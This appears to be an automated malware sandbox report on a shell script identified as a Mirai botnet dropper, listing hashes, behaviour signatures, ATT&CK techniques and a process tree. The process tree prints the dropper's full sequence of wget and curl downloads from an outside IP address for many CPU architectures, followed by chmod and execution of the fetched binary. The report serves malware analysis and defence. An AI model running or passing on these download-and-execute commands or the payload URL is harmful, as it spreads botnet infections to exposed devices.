Analysis
-
max time kernel
139s -
max time network
149s -
platform
debian-9_armhf -
resource
debian9-armhf-20240611-en -
resource tags
-
submitted
07/03/2025, 05:18
General
-
Target
97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
-
Size
2KB
-
MD5
92b0a18b935a6afdea317d573967bd1e
-
SHA1
09eeb86ddb300ff70f09613b2f50813488851c74
-
SHA256
97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01
-
SHA512
0abac2769286e7dcd3893ac64e604556418e134ddc6b5b38b9a7353fe3cb3048da3fa189416ec05c83147ca1f4c0a8dca2513f2fe7c93927097267884933dc14
Malware Config
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Extracted
mirai
LZRD
Signatures
-
Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
-
Mirai family
-
File and Directory Permissions Modification 1 TTPs 15 IoCs
Adversaries may modify file or directory permissions to evade defenses.
-
Executes dropped EXE 15 IoCs
-
Modifies Watchdog functionality 1 TTPs 4 IoCs
Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Writes file to system bin folder 4 IoCs
-
UPX packed file 2 IoCs
Detects executables packed with UPX/modified UPX open source packer.
-
Checks CPU configuration 1 TTPs 15 IoCs
Checks CPU information which indicate if the system is a virtual machine.
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
-
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh/tmp/97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh1⤵
- Executes dropped EXE
- Writes file to tmp directory
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.x862⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.x862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.x862⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.mips2⤵
- Checks CPU configuration
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
-
-
/bin/catcat trw.mips2⤵
- System Network Configuration Discovery
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.mips trw.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.arc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.arc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.arc2⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.mips trw.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.i4682⤵
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.i4682⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.i4682⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.i468 trw.mips trw.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.i6862⤵
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.i6862⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.i6862⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.i468 trw.i686 trw.mips trw.x862⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.x86_642⤵
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.x86_642⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.x86_642⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.i468 trw.i686 trw.mips trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.mpsl2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.mpsl2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.mpsl2⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.arm2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.arm2⤵
- Checks CPU configuration
- Writes file to tmp directory
-
-
/bin/catcat trw.arm2⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.arm trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.arm52⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.arm52⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.arm52⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.arm trw.arm5 trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.arm62⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.arm62⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.arm62⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.arm trw.arm5 trw.arm6 trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.arm72⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.arm72⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.arm72⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh systemd-private-cd782eb87cfa440791e0a18dd329d89e-systemd-timedated.service-eKjZXX trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.ppc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.ppc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.ppc2⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.mips trw.mpsl trw.ppc trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.spc2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.spc2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.spc2⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.mips trw.mpsl trw.ppc trw.spc trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.m68k2⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.m68k2⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.m68k2⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.m68k trw.mips trw.mpsl trw.ppc trw.spc trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
-
/usr/bin/wgetwget http://23.146.184.61/hiddenbin/trw.sh42⤵
- Writes file to tmp directory
-
-
/usr/bin/curlcurl -O http://23.146.184.61/hiddenbin/trw.sh42⤵
- Checks CPU configuration
- Reads runtime system information
- Writes file to tmp directory
-
-
/bin/catcat trw.sh42⤵
-
-
/bin/chmodchmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.m68k trw.mips trw.mpsl trw.ppc trw.sh4 trw.spc trw.x86 trw.x86_642⤵
- File and Directory Permissions Modification
-
-
/tmp/trf./trf2⤵
-
Network
MITRE ATT&CK Enterprise v15
Defense Evasion
File and Directory Permissions Modification
1Linux and Mac File and Directory Permissions Modification
1Impair Defenses
1Virtualization/Sandbox Evasion
1System Checks
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
23KB
MD527fcca0043a2d0fa3b8c1474ba6a347b
SHA13256cb03556b457ae35baf22c021c75f4a1465af
SHA256c518491ac679b646db6f34599a0be7309b7ec2cb6cd39dd97c46bcfc69f78098
SHA51222f394294adaf48bc9e9c592c8c1e94becaa72cb66c03efb442d1c8b379772f403ee695f0f12ce546a9dd62ae20240c045024396fcab9cf6876ab27301ef157c
-
Filesize
105KB
MD56e875e36906ef9cbd1a9a4cc6abb58a1
SHA1c1a38724e70c8d76597b71681ab4255fd3690b91
SHA256367b363d373acd4198ee34d58007362362ec51c8306392434a5d2b0fc1d4fc41
SHA512b416a9528d4e62785fe5a9ecba276f9d4ea468db68330a606ace0d7aa0ea1628861ab8c8a17c46c6bd79b676c3948e5604ca3906bb9c9754d855a1fcc0baab8f
-
Filesize
216B
MD5eff80b39647abde14518e7b9c1f2d05b
SHA1e14e90d5b962986c778e8cd5a6a33f525d830e05
SHA256866dd35f127c93609824229cd8a62ed643c8024308763319f8a9168b5f75aa15
SHA5129f38847736ade64e6d2d5261cef5155861a39a35cba62d76cb90d1c82296246e13d81af74daa0440f575146ebae0efcea0ee9804e6218e37a49276cb1d906db3
-
Filesize
216B
MD5f16b068167c523b48268d50341f14703
SHA1a794a7c971b7d272459e2ea243f6c8038a0f48ab
SHA256cba8069f0157c5e9210c815723a74abd794aab46d66069bd4eaa259dc79e7f23
SHA5129ba5cc35283506694314c07241caa8119aeb58717dcd578481ce4add6bf6200f4a2ed494fa58e4d2a8ccde204e141dca59231bce8381e2313e8b130d79cf29c7
-
Filesize
57KB
MD5c2ab4cecc92e3d88b002ddae04006cfd
SHA1a4c5e9225330897210034edadeea8a5414cf4e8d
SHA2563bab0fcddf33dfce02e04246ae91aa5f6afb8cdc3dccfc75855e42e0144727c5
SHA512516920477bf3c245d27ed99bcc0e48aa2fcf002af5f23ea6d178a4d9216462b464bd4f7f49fe4b6b8bea75a26b35160b420f59fa1f8271ebc17d85699160f568
-
Filesize
20KB
MD5f6f62476e54629a3ef494d918cc2a921
SHA14c041456f2695eb66b953e6caa640fe24f8467ff
SHA2569aeec2bcc4f00c0458d786066d910827abdfe95f441a2ade518df222efb439f5
SHA512fbdf3bc209c16870abc1fd2ff349a726d12ed0a6c4b32b1ea36b4f47c02da236e3cf70e63380156c508adbae98e621e1ed377d604280a9180ebe784c6bb66302